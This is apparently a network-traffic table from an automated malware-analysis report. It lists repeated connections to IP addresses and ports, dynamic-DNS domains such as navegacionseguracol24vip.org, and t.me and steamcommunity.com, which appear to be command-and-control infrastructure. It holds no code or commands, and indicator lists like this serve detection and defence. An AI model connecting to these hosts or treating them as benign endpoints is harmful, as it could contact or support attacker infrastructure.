| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
